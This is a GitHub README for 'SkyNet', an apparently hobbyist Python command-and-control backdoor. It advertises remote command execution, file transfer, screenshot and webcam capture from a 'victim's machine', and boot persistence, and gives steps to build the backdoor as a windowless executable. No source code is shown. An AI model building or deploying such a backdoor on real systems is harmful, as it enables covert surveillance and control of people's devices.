Skip to content
/ SkyNet Public

SkyNet is a Command and Control (C2) system that enables remote management of devices via a backdoor

License

Notifications You must be signed in to change notification settings

17tayyy/SkyNet

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 

Repository files navigation

Skynet

Captura de pantalla 2024-10-27 195536

Skynet is a powerful Command and Control (C2) designed for interacting with and managing multiple devices remotely through a backdoor. This software allows for command execution, file transfer, and capturing screenshots and webcam images from the victim's machine. Its functionality includes persistence, ensuring that the backdoor remains active even after reboots.

Features

  • Persistence: The backdoor is configured to automatically start upon system boot, ensuring its presence on every startup.
  • Remote Interaction: Provides a command-line interface that allows operators to effectively interact with the victim's system.

Requirements

To run Skynet, make sure you have the following Python libraries installed:

pip install mss opencv-python

Installation

  1. Clone the repository:

    git clone https://github.com/17tayyy/skynet.git
    cd skynet
  2. Run the C2 server:

    python3 skynet.py
  3. Compile the backdoor (optional):

    To compile the backdoor into a .exe executable, use PyInstaller:

    pyinstaller --onefile --noconsole backdoor.py

I will be doing updates and adding more cool features

Warning

Skynet is a powerful tool and should be used ethically and legally. Unauthorized use on systems you do not own is illegal and could lead to legal consequences. Use this tool only on systems you own or in controlled testing environments.

About

SkyNet is a Command and Control (C2) system that enables remote management of devices via a backdoor

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages